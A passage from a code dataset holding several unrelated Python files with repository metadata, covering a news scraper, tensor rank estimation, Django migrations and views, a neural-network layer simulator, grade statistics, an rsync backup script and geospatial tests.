def get_closing_bracket(string, indice_inicio):
"""Retorna o indice da '}' correspondente a '{' no indice recebido."""
if string[indice_inicio] != '{':
raise ValueError("String invalida")
deque = collections.deque()
for atual in range(indice_inicio, len(string)):
if string[atual] == '}' and string[atual-1] != '\\':
deque.popleft()
elif string[atual] == '{' and string[atual-1] != '\\':
deque.append(string[indice_inicio])
if not deque:
return atual # O '}' correpondente foi encontrado
raise ValueError("String invalida")
def get_noticias(url):
"""Retorna as noticias com titulo e subtitulo em uma lista."""
pagina = requests.get(url)
soup = BeautifulSoup(pagina.text, 'html.parser')
lista_noticias = []
# Buscar noticias em html
for noticia in soup.find_all(class_="feed-post-body"):
titulo = noticia.find(class_="feed-post-link")
if titulo is None or titulo.contents is None:
continue
subtitulo = noticia.find(class_="feed-post-body-resumo")
noticia = dict(titulo=titulo.contents[0], subtitulo=None)
if subtitulo is not None:
noticia["subtitulo"] = subtitulo.contents[0]
lista_noticias.append(noticia)
# Buscar noticias no JSON dentro do JS da pagina
feed = str(soup.find(class_="fore-posts-setted"))
indice_chave = feed.find('{"') # O JSON inicia usualmente em "config"
json_feed = feed[indice_chave : get_closing_bracket(feed, indice_chave)+1]
dict_feed = json.loads(json_feed)
for noticia in dict_feed["forePosts"] + dict_feed["items"]:
if noticia["type"] in ("materia", "cobertura"):
lista_noticias.append(
{
"titulo": noticia["content"]["title"],
"subtitulo": noticia["content"].get("summary")
}
)
return lista_noticias
|
[
"schneider8357@hotmail.com"
] |
schneider8357@hotmail.com
|
07be42846ea3adc4c1fcc1067837e0394309c7c8
|
968003c0336733ad45ccedbdce23b51a4df89825
|
/hottbox/rank/rank_estimation.py
|
f4f5795d89d2884c57d3fe690bc3c3773553ac41
|
[
"Apache-2.0"
] |
permissive
|
hottbox/hottbox
|
0167ed079ba9608c6c1b3366bc522dabd824075f
|
26580018ec6d38a1b08266c04ce4408c9e276130
|
refs/heads/develop
| 2020-03-07T05:36:06.008704
| 2020-01-31T12:47:52
| 2020-01-31T12:47:52
| 127,300,555
| 175
| 25
|
Apache-2.0
| 2020-01-31T12:54:16
| 2018-03-29T14:07:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
import numpy as np
from ..core.structures import Tensor
from ..algorithms.decomposition.cpd import CPD
def rankest(tensor, rank_range, epsilon=10e-3, verbose=False):
""" Estimate the optimal Kruskal rank of a tensor
Parameters
----------
tensor : Tensor
Multi-dimensional data which Kruskal rank is to be estimated
rank_range : list[int]
List of rank values to be tested
epsilon : float
Threshold for the relative error of approximation.
verbose : bool
Enable verbose output
Returns
-------
optimal_rank : tuple
Optimal Kruskal rank. For consistency, the type of the returned value is tuple
"""
if not isinstance(rank_range, list):
raise TypeError("The `rank_range` should be passed as a list of integers")
if not all(isinstance(value, int) for value in rank_range):
raise TypeError("The `rank_range` should consist of integers only")
cpd = CPD(verbose=False)
rel_error = []
for rank in rank_range:
cpd.decompose(tensor=tensor, rank=(rank,))
rel_error.append(cpd.cost[-1])
if verbose:
print('Rank = {}, Approximation error = {}'.format((rank,), cpd.cost[-1]))
if rel_error[-1] <= epsilon:
break
# Reset cost value for cpd. Should work even without it
cpd.cost = []
optimal_value = rank_range[rel_error.index(min(rel_error))]
optimal_rank = (optimal_value,)
return optimal_rank
def mlrank(tensor):
""" Calculate the multi-linear rank of a tensor
Parameters
----------
tensor : Tensor
Multidimensional data which multi-linear rank is to be computed
Returns
-------
ml_rank : tuple
Multi-linear rank
"""
# TODO: implement setting a threshold for singular values
order = tensor.order
ml_rank = [np.linalg.matrix_rank(tensor.unfold(mode=i, inplace=False).data) for i in range(order)]
ml_rank = tuple(ml_rank)
return ml_rank
|
[
"ilyakisil@gmail.com"
] |
ilyakisil@gmail.com
|
906140f5f9e9984a384bf2df06111b3814945311
|
643293536a8e09d05ee7df0da7a5a19369331f7e
|
/kindred_api/migrations/0003_remove_user_ig_token_expiry.py
|
8ae9e09e54d9a7f4995482614d0ce6a2393211ea
|
[] |
no_license
|
williamflaherty/kindred-api
|
1caa53a7f4acfdd23fd5b6d8656cc40394ad94a3
|
7110290a0d7b3aed272d4125f38eed366b415d01
|
refs/heads/master
| 2021-03-22T04:36:34.401632
| 2015-07-31T12:22:44
| 2015-07-31T12:22:44
| 39,611,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('kindred_api', '0002_auto_20150725_2011'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='ig_token_expiry',
),
]
|
[
"william.flaherty@gmail.com"
] |
william.flaherty@gmail.com
|
80a10e59342491b0f719f60ab2dabcaa09b7a8af
|
c123929d263042368ecab95d0efc791b084cc5ef
|
/exambook/asgi.py
|
7a9b6dab347618e406f847de2195985a7c9c9f24
|
[] |
no_license
|
mufazzalshokh/examboook
|
6b05232c47bd90b7191fd1c1b70a9573958e9704
|
7c70e5338a1cf4e8ea73622bd645c3c5a3f7fba3
|
refs/heads/master
| 2023-08-15T00:08:43.170106
| 2021-09-22T19:59:34
| 2021-09-22T19:59:34
| 385,854,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
ASGI config for exambook project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'exambook.settings')
application = get_asgi_application()
|
[
"zafarberdinazarov@Zafars-MacBook-Air.local"
] |
zafarberdinazarov@Zafars-MacBook-Air.local
|
648342a399665026c92a81498c91443f2eea80e2
|
9a05de245f3d87a731a44f47a1c316d3fe0d996b
|
/src/paloma/migrations/0011_auto__chg_field_mailbox_user.py
|
b7414063ade935c0e278c011b6e13bde31cc2445
|
[
"BSD-2-Clause"
] |
permissive
|
harajuku-tech/paloma
|
4c3651711d76b0df86692cf45b1bced221b8cc77
|
5be6ac7724ec0cabe5390b7018112f41fdec7581
|
refs/heads/master
| 2021-01-10T22:04:11.898174
| 2012-09-18T02:55:21
| 2012-09-18T02:55:21
| 3,616,369
| 0
| 1
| null | 2012-09-17T06:02:54
| 2012-03-04T05:56:51
|
Python
|
UTF-8
|
Python
| false
| false
| 10,049
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Mailbox.user'
db.alter_column('paloma_mailbox', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True))
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'Mailbox.user'
raise RuntimeError("Cannot reverse this migration. 'Mailbox.user' and its values cannot be restored.")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'paloma.alias': {
'Meta': {'object_name': 'Alias'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'alias': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailbox': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {})
},
'paloma.domain': {
'Meta': {'object_name': 'Domain'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'backupmx': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maxquota': ('django.db.models.fields.BigIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'quota': ('django.db.models.fields.BigIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'transport': ('django.db.models.fields.CharField', [], {'max_length': '765'})
},
'paloma.group': {
'Meta': {'unique_together': "(('owner', 'name'), ('owner', 'symbol'))", 'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'symbol': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
},
'paloma.journal': {
'Meta': {'object_name': 'Journal'},
'dt_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_jailed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'recipient': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'text': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'paloma.mailbox': {
'Meta': {'object_name': 'Mailbox'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bounces': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['paloma.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'paloma.message': {
'Meta': {'object_name': 'Message'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailbox': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Mailbox']"}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Schedule']"}),
'text': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'paloma.operator': {
'Meta': {'object_name': 'Operator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'paloma.owner': {
'Meta': {'object_name': 'Owner'},
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'forward_to': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'paloma.schedule': {
'Meta': {'object_name': 'Schedule'},
'dt_start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'forward_to': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['paloma.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '24', 'db_index': 'True'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '101'}),
'task': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'max_length': '100'})
}
}
complete_apps = ['paloma']
|
[
"gmail@hdknr.com"
] |
gmail@hdknr.com
|
3f420e13c93c7aa89a8a063eca9f36043e5b52b1
|
4c41163cb921215f0d089f0e485103a621b6990b
|
/cmdr/cmdp/views.py
|
44546d5fec1b9eb5da145cdc5e9a938360b98c44
|
[] |
no_license
|
haman1/CRUD
|
582a1858c5cab370b0283b33f5c3f9814db0ebe3
|
922cbd9cf5536ce56c83cee053f51ee0d891b73b
|
refs/heads/master
| 2022-07-16T20:47:47.092695
| 2020-05-13T17:05:04
| 2020-05-13T17:05:04
| 263,691,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
from django.views.generic import ListView
# Create your views here.
from .models import Cmdr
class HomePageView(ListView):
model = Cmdr
template_name = 'home.html'
|
[
"ombasaherman@gmail.com"
] |
ombasaherman@gmail.com
|
574e9a3ede31b2a2ec1ea8f1f6ed416baced133d
|
f26233042850800454406617fa2eb9b7669364f8
|
/MIsim/compute.py
|
2a9888472c65ef9b857a5789cc1d41ab39a4be06
|
[
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
iniverno/MIsim
|
69144f9669d00429da5c396ebf95dc9c21f886b7
|
c37ab10c19cd009bf4a916e88c916e4f2e5321ba
|
refs/heads/master
| 2021-01-10T09:47:12.746751
| 2016-02-04T22:23:04
| 2016-02-04T22:23:04
| 51,109,803
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,536
|
py
|
##################################################################################3
#
# Jorge Albericio, 2015
# jorge@ece.utoronto.ca
#
##################################################################################
import chunk
import numpy as np
import math
# in:
# data : numpy 3D ndarray of dimensions i * Wx * Wy, i=# input features, Wx=Wy= size of input
# filters: a list with two elements, we will use the field "data" of both,
# filters[0].data = numpy 4D ndarray of dimensions N * i * Fx * Fy with the filter values
# filters[1].data = numpy 1D vector with the N biases
# N = # filters, Fx=Fy= filter size
def computeConvolutionalLayer(data, filters, stride, padding, group):
weights = filters[0].data
biases = filters[1].data
N = weights.shape[0]
i = weights.shape[1]
Fx = weights.shape[2]
Fy = weights.shape[3]
Ix = data.shape[1]
Iy = data.shape[2]
if padding != 0:
data = adjustDataPadding(data, padding)
Ix = data.shape[1]
Iy = data.shape[2]
assert weights.shape[1]*group==data.shape[0], "#filters (%d) is not equal to #input features (%d)" %(weights.shape[1], data.shape[0])
assert Ix==Iy, "Input width (%d) is not equal to Input height (%d)" %(data.shape[1], data.shape[2])
assert Fx==Fy, "Filter width (%d) is not equal to Filter height (%d)" %(Fx, Fy)
output = np.zeros((N, (Ix-Fx)/stride+1, (Iy-Fy)/stride+1))
outPosX = 0
for posInputX in range(0, Ix-Fx+1, stride):
outPosY = 0
print posInputX
for posInputY in range(0, Iy-Fy+1, stride):
for cntFilter in range(N): #for each filter we are going to calculate the convolution of the filter at the particular x,y position
# This implementation will work as long as group is 1 or 2, IT WON'T WORK FOR OTHER VALUES Of GROUP
if cntFilter < N/group:
output[cntFilter, outPosY, outPosX] = computeWindow(weights[cntFilter], data[:(data.shape[0]/group), posInputY:posInputY+Fy, posInputX:posInputX+Fx])
else:
output[cntFilter, outPosY, outPosX] = computeWindow(weights[cntFilter], data[(data.shape[0]/group):, posInputY:posInputY+Fy, posInputX:posInputX+Fx])
output[cntFilter, outPosY, outPosX] += biases[cntFilter]
outPosY += 1
outPosX += 1
return output
def computeWindow(filter, data):
return np.sum(filter*data)
# this is simply an implementation of the previous function but using loops
def computeWindowLoops(filter, data):
aux = 0
for posFilterX in range(filter.shape[1]):
for posFilterY in range(filter.shape[2]):
for posFilterI in range(filter.shape[0]):
aux += filter[posFilterI][posFilterX][posFilterY] * \
data[posFilterI][posFilterX][posFilterY]
return aux
def adjustDataPadding(data, padding):
assert padding != 0, "Padding is zero"
aux = np.zeros((data.shape[0], data.shape[1] + 2*padding, data.shape[2] + 2*padding))
aux[:, padding:-padding, padding:-padding] = data
return aux
def computeMaxPoolLayer(data, filterSize, stride, padding):
if padding !=0: adjustPadding(data, padding)
Ix = data.shape[1]
Iy = data.shape[2]
output = np.zeros((data.shape[0], (Ix-filterSize)/stride+1, (Iy-filterSize)/stride+1))
outPosX = 0
for posInputX in range(0, Ix - filterSize + 1, stride):
outPosY = 0
for posInputY in range(0, Iy - filterSize + 1, stride):
for cntFeature in range(0, data.shape[0]):
output[cntFeature, outPosY, outPosX] = np.max(data[cntFeature, posInputY:posInputY+filterSize, posInputX:posInputX+filterSize])
outPosY += 1
outPosX +=1
return output
# It computes a Local Response Normalization Layer
# for each element in the data array, it uses an auxiliar function to compute the proper value
# return: a matrix with the values after applying the function in the input data
def computeLRNLayer(data, size, alpha, beta):
aux = np.zeros(data.shape)
for posX in range(data.shape[1]):
for posY in range(data.shape[2]):
for posI in range(data.shape[0]):
aux[posI, posY, posX] = computePosLRN(data, posX, posY, posI, size, alpha, beta)
return aux
# it computes the LocalResponse normalization at a particular position
# it is defined by the equation result = data[i,y,x] / pow(1+a/size*sum(data[i-2:i+2, y, x]), b)
# data: complete input data
# x,y,i: position
# size: number of positions in the i dimension to take into account
# a, b: paramemeters in the equation
def computePosLRN(data, x, y, i, size, a, b):
value = 0.0
for cnt in range(-(size/2), size/2 + 1):
pos = i + cnt
if pos >= 0 and pos < data.shape[0]:
value += data[pos, y, x]**2
value = math.pow((1 + a/float(size) * value), b)
return data[i,y,x] / value
def computeSoftmaxLayer(x):
e_x = np.exp(x - np.max(x))
out = e_x / e_x.sum()
return out
def computeDropoutLayer(data, dropoutFactor):
return data * dropoutFactor
def computeReLULayer(data):
aux = np.copy(data)
for i,e in enumerate(aux.flat):
if e<0: aux.flat[i] = 0
return aux
for posX in range(data.shape[1]):
for posY in range(data.shape[2]):
for posI in range(data.shape[0]):
if data[posI, posY, posX] < 0: aux[posI, posY, posX] = 0.0
else: aux[posI, posY, posX] = data[posI, posY, posX]
return aux
def computeFullyConnected(data, filters):
filters = filters[0].data
aux = np.zeros((filters.shape[0]))
for i in range(filters.shape[0]):
aux[i] = np.sum(filters[i] * data.flatten())
return aux
|
[
"jorge.albericio@gmail.com"
] |
jorge.albericio@gmail.com
|
fa93d85569c12cb7aa7140fff0a8c35bf8da0a13
|
85b958530cbf8a77c5766f88eb8a6590bdf1ad56
|
/application/controllers/area_atencion/delete.py
|
b554fddf5f50405484aa2c5594a37eac73d00faa
|
[] |
no_license
|
charliecarmona44/tut2018
|
1e1ed8c56ebf6b2df09b59a5010d8ebbc17d433e
|
54c796a4bdda29a9c5be371de55804ccc4eb9af8
|
refs/heads/master
| 2022-03-13T21:00:05.623926
| 2019-07-19T15:53:18
| 2019-07-19T15:53:18
| 197,802,686
| 0
| 0
| null | 2019-10-31T08:23:54
| 2019-07-19T15:51:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,018
|
py
|
import config
import hashlib
import app
class Delete:
def __init__(self):
pass
'''
def GET(self, id_area_atencion, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege # get the session_privilege
if session_privilege == 0: # admin user
return self.GET_DELETE(id_area_atencion) # call GET_DELETE function
elif privsession_privilegeilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
def POST(self, id_area_atencion, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege
if session_privilege == 0: # admin user
return self.POST_DELETE(id_area_atencion) # call POST_DELETE function
elif session_privilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
@staticmethod
def GET_DELETE(id_area_atencion, **k):
@staticmethod
def POST_DELETE(id_area_atencion, **k):
'''
def GET(self, id_area_atencion, **k):
message = None # Error message
id_area_atencion = config.check_secure_val(str(id_area_atencion)) # HMAC id_area_atencion validate
result = config.model.get_area_atencion(int(id_area_atencion)) # search id_area_atencion
result.id_area_atencion = config.make_secure_val(str(result.id_area_atencion)) # apply HMAC for id_area_atencion
return config.render.delete(result, message) # render delete.html with user data
def POST(self, id_area_atencion, **k):
form = config.web.input() # get form data
form['id_area_atencion'] = config.check_secure_val(str(form['id_area_atencion'])) # HMAC id_area_atencion validate
result = config.model.delete_area_atencion(form['id_area_atencion']) # get area_atencion data
if result is None: # delete error
message = "El registro no se puede borrar" # Error messate
id_area_atencion = config.check_secure_val(str(id_area_atencion)) # HMAC user validate
id_area_atencion = config.check_secure_val(str(id_area_atencion)) # HMAC user validate
result = config.model.get_area_atencion(int(id_area_atencion)) # get id_area_atencion data
result.id_area_atencion = config.make_secure_val(str(result.id_area_atencion)) # apply HMAC to id_area_atencion
return config.render.delete(result, message) # render delete.html again
else:
raise config.web.seeother('/area_atencion') # render area_atencion delete.html
|
[
"53064537+charliecarmona44@users.noreply.github.com"
] |
53064537+charliecarmona44@users.noreply.github.com
|
4765bc6a151dd2ace0a1caa820041abaa0e3233f
|
1bccf0b1374dcfddfc3e320fd5b6af499334df2d
|
/data/rsync.py
|
904679ac972e2e9f6646d7eed2179b1a3253946a
|
[
"Unlicense"
] |
permissive
|
chebee7i/twitter
|
6b245f5a7b7510089b62d48567e6208e1fe8a1db
|
ec1d772c3ef7d2288ac8051efb8637378f3ec195
|
refs/heads/master
| 2021-01-01T16:25:13.242941
| 2015-06-24T19:39:24
| 2015-06-24T19:39:24
| 23,846,593
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
"""
Script to backup Twitter data using rsync.
A lockfile ensures that this script does not run until the previous run has
finished.
"""
from __future__ import print_function
import errno
import fcntl
import glob
import os
import subprocess
import sys
import time
import configparser
config = configparser.ConfigParser()
config.read('../project.cfg')
BACKUP_PATH = config['Locations']['BACKUP_PATH']
MONGO_PREFIX = config['Prefixes']['MONGO_PREFIX']
def rsync(path=None):
if path is None:
path = BACKUP_PATH
print()
print("-----")
subprocess.call('date')
cmd = 'rsync --progress -zhtr *.gz *.log {0}* {1}'
cmd = cmd.format(MONGO_PREFIX, path)
print(cmd)
subprocess.call(cmd, shell=True)
def main():
with open('.lock_rsync', 'w') as f:
try:
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError, e:
if e.errno == errno.EAGAIN:
msg = '[{0}] rsync script already running.\n'
msg = msg.format(time.strftime('%c'))
sys.stderr.write(msg)
sys.exit(-1)
raise
rsync()
if __name__ == '__main__':
main()
|
[
"chebee7i@gmail.com"
] |
chebee7i@gmail.com
|
86b7e9291c8130f09049ae542b9f23a1ef115a28
|
50f239890cf2708f9e2f9fa29216aeaea360eb31
|
/tests/examples/inconsistent_pipeline.py
|
d41f71045fab62e79b38a4af27dfb509993c53f0
|
[
"MIT"
] |
permissive
|
jbn/modpipe
|
485b18cf13290724c2b282b849ca4ac7b2d0f03e
|
06e182704d4582ab41ce92f5ae1a908874bf60e2
|
refs/heads/master
| 2021-06-23T09:31:08.432654
| 2019-06-19T17:36:55
| 2019-06-19T17:36:55
| 137,112,992
| 4
| 0
|
MIT
| 2019-06-19T17:36:57
| 2018-06-12T18:35:50
|
Python
|
UTF-8
|
Python
| false
| false
| 169
|
py
|
def f(x):
return {'value': x}
def g(src):
return src, {}
def h(src, dst):
dst['computation'] = src['value'] * 2
def last_one(src, dst):
return dst
|
[
"jbn@abreka.com"
] |
jbn@abreka.com
|
e3d8013e33d572b49aff44454e400c499ce32db6
|
b4eff234e9faf8656a6012bbc36c4da3267e3a8a
|
/Laboratorium2/zad5_lib.py
|
bbd622f0b41b7544bc95cd47b0eff61ce09b14a7
|
[] |
no_license
|
rzeznia/pythonWSBpwjs
|
1ab339bb8f9c28840e40e5d7cf0afe0188a9184a
|
81e5df9a58e6b11d120bfd67fbf9054e52518bdc
|
refs/heads/master
| 2020-04-09T05:36:38.276884
| 2019-01-27T13:22:20
| 2019-01-27T13:22:20
| 160,071,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
from math import sqrt
def srednia(lista_ocen):
liczba_ocen = len(lista_ocen)
return suma_ocen(lista_ocen) / liczba_ocen
def suma_ocen(lista_ocen):
liczba_ocen = len(lista_ocen)
suma = 0
for ocena in lista_ocen:
suma += ocena
return suma
def mediana(lista_ocen):
liczba_ocen = len(lista_ocen)
cen = liczba_ocen // 2
if liczba_ocen % 2 != 0:
return lista_ocen[int(cen)]
else:
return srednia([lista_ocen[cen-1], lista_ocen[cen]])
def odchylenie(lista_ocen):
avg = srednia(lista_ocen)
kwadrat_suma = 0
for ocena in lista_ocen:
kwadrat_suma += pow(ocena - avg, 2)
wariancja = kwadrat_suma/avg
return sqrt(wariancja)
|
[
"marcin.gd3@gmail.com"
] |
marcin.gd3@gmail.com
|
6f02326609f002098b509e1d2671a05d4d6e528b
|
fed0f32e035eb26c5acb84d9ee7626bf6e3c3d39
|
/Finding the multiple.py
|
5a87711d731a36421bf8d09e8bcb7702a6c20845
|
[] |
no_license
|
Suru996/SRM-e_lab-Python-Level-1
|
6f0ad4db94b3377d13b8bf92382294495c7fcee2
|
d69a93018d862e668cee76791c081df36a05f8e5
|
refs/heads/main
| 2023-07-27T12:13:10.743000
| 2021-08-22T10:19:50
| 2021-08-22T10:19:50
| 387,500,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
py
|
n = int(input())#Length of list
b = []
for x in range(0,n):
a = int(input())# input from user
b.append(a)#Assigning each value given by user as integer type
k = int(input())#Multiples of k
for x in range(0,n):
if(b[x] % k ==0):
print(b[x])
|
[
"noreply@github.com"
] |
Suru996.noreply@github.com
|
96bac37f424b77980856d7e2566c984015610ba9
|
b97f8bbc34d4b6d07e23eb86eb3e584f67dc90f2
|
/base_station/tests.py
|
61bdfcd87f90495f6c93cb301d1cd87446463de0
|
[
"Apache-2.0"
] |
permissive
|
EpicEric/base_stations_django
|
5f6a8df402cdae825bd9b67663cfbe66d93525dc
|
7a04bc78ebe59067e7ff117862c9d2b0182d5d13
|
refs/heads/master
| 2021-03-24T13:03:09.073738
| 2018-12-29T13:31:25
| 2018-12-29T13:31:25
| 122,376,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,314
|
py
|
from collections import Counter
from django.test import TestCase
from django.contrib.gis.geos import Point
from model_mommy import mommy
from base_station.models import IdentifiedBaseStation
class IdentifiedBaseStationTestCase(TestCase):
def test_one_bs_inside_bounds(self):
bs = mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5))
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(bs_within_box.first(), bs)
def test_some_bs_inside_and_some_outside_bounds(self):
bs_inside = [
mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(-46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.0, -23.9))]
bs_outside = [
mommy.make(IdentifiedBaseStation, point=Point(-47.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.3, -24.1))]
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(Counter(bs_within_box), Counter(bs_inside))
def test_get_covered_area(self):
#TODO
pass
|
[
"mateusnakajo@gmail.com"
] |
mateusnakajo@gmail.com
|
